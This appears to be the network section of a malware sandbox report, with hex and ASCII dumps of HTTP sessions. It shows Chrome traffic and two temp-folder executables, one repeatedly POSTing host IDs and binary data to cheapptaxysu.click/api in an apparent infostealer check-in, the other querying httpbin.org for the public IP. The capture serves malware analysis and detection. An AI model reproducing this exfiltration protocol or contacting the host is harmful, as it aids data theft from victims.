                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72
                                                                                                                                                                                                                                                          Data Ascii: c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{constructor
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC1390INData Raw: 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33
                                                                                                                                                                                                                                                          Data Ascii: rn a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let c,d;b\u003
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC204INData Raw: 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 3d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC331INData Raw: 31 34 34 0d 0a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 65 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6a 65 5c 75 30 30 33
                                                                                                                                                                                                                                                          Data Ascii: 144d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.ee(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};je\u003


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.449749172.217.19.2284437488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:36 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:37 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.449755104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC374OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=G5X2Z0O88EIIBNVTJIF
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 18164
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC15331OUTData Raw: 2d 2d 47 35 58 32 5a 30 4f 38 38 45 49 49 42 4e 56 54 4a 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 35 58 32 5a 30 4f 38 38 45 49 49 42 4e 56 54 4a 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 35 58 32 5a 30 4f 38 38 45 49 49 42 4e 56 54 4a 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --G5X2Z0O88EIIBNVTJIFContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--G5X2Z0O88EIIBNVTJIFContent-Disposition: form-data; name="pid"2--G5X2Z0O88EIIBNVTJIFContent-Disposition: form-data; name="lid"CZJvss--
                                                                                                                                                                                                                                                          2024-12-19 13:20:37 UTC2833OUTData Raw: a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de
                                                                                                                                                                                                                                                          Data Ascii: jf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                                                                                                                                                                                          2024-12-19 13:20:38 UTC1144INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=bsrtcbn58gqmmm0ro87pgf3eo1; expires=Mon, 14 Apr 2025 07:07:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JUWqHXFvg737h1kUsHjriwgR6JK%2F41Yi5%2F6Jx96qA7zm8tz8%2FI%2F8QIEZotIW7Yuun6UiCE%2B%2FnqgvZXFv%2BkKGkGMlmi3GaPvnHisIfDUNOhulc%2FBNfUQSrENk%2F0JwqSeqt3Yjh6k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b0e918ea8c27-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2022&rtt_var=816&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19218&delivery_rate=1294900&cwnd=243&unsent_bytes=0&cid=200c4cc1f49b6339&ts=1311&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:20:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.449762104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:39 UTC371OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=22Q8V91IF6WOGVLK5
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8773
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:39 UTC8773OUTData Raw: 2d 2d 32 32 51 38 56 39 31 49 46 36 57 4f 47 56 4c 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 32 51 38 56 39 31 49 46 36 57 4f 47 56 4c 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 32 51 38 56 39 31 49 46 36 57 4f 47 56 4c 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 32 32 51 38
                                                                                                                                                                                                                                                          Data Ascii: --22Q8V91IF6WOGVLK5Content-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--22Q8V91IF6WOGVLK5Content-Disposition: form-data; name="pid"2--22Q8V91IF6WOGVLK5Content-Disposition: form-data; name="lid"CZJvss----22Q8
                                                                                                                                                                                                                                                          2024-12-19 13:20:40 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:40 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=0q19e9qa1hp3goe0jhgeohn0if; expires=Mon, 14 Apr 2025 07:07:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bv%2Fv%2BibGG2hTt6AKDX6O4Wd1I3mVer8nhcY2jvHL6fgW9YbOFPvZbtIpUMwyv5sRSDJ37TDLYHjCS4NuXrkauhTzvo228DLBKXFnAlAVTyDq9qOKMiLMctJvcS05TQHifTk8ZfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b0f9da0842fb-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1777&rtt_var=670&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9802&delivery_rate=1628555&cwnd=212&unsent_bytes=0&cid=f38704736c78da89&ts=820&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:20:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.449767104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:42 UTC372OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=KQ1EZBWSPPCI9WAWM
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20426
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:42 UTC15331OUTData Raw: 2d 2d 4b 51 31 45 5a 42 57 53 50 50 43 49 39 57 41 57 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 51 31 45 5a 42 57 53 50 50 43 49 39 57 41 57 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 51 31 45 5a 42 57 53 50 50 43 49 39 57 41 57 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 4b 51 31 45
                                                                                                                                                                                                                                                          Data Ascii: --KQ1EZBWSPPCI9WAWMContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--KQ1EZBWSPPCI9WAWMContent-Disposition: form-data; name="pid"3--KQ1EZBWSPPCI9WAWMContent-Disposition: form-data; name="lid"CZJvss----KQ1E
                                                                                                                                                                                                                                                          2024-12-19 13:20:42 UTC5095OUTData Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                          2024-12-19 13:20:43 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:43 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=c0cg8dl8iqgkqq5thspnrkct9p; expires=Mon, 14 Apr 2025 07:07:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BPxJ7RuMXwKuTWP3jclYtH5NkxHLm7xO6XK5dvWFwdFUFx6621dEWzMYwAwOwsRhhLEzT1FNU883PEYiU%2BinOCRLm9ix17GhdulDlK4RMHA4ljNwJx7btFAgXl6%2BQrwO4tim5J8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b1097ddf438e-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1698&rtt_var=646&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21478&delivery_rate=1681059&cwnd=206&unsent_bytes=0&cid=2ff079cd231c08d3&ts=1044&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:20:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.44976998.85.100.804436440C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:43 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                          Host: httpbin.org
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          2024-12-19 13:20:44 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:44 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                          2024-12-19 13:20:44 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                                                                                                          Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.449773104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:44 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=C7LNNH0JPK4M1TR
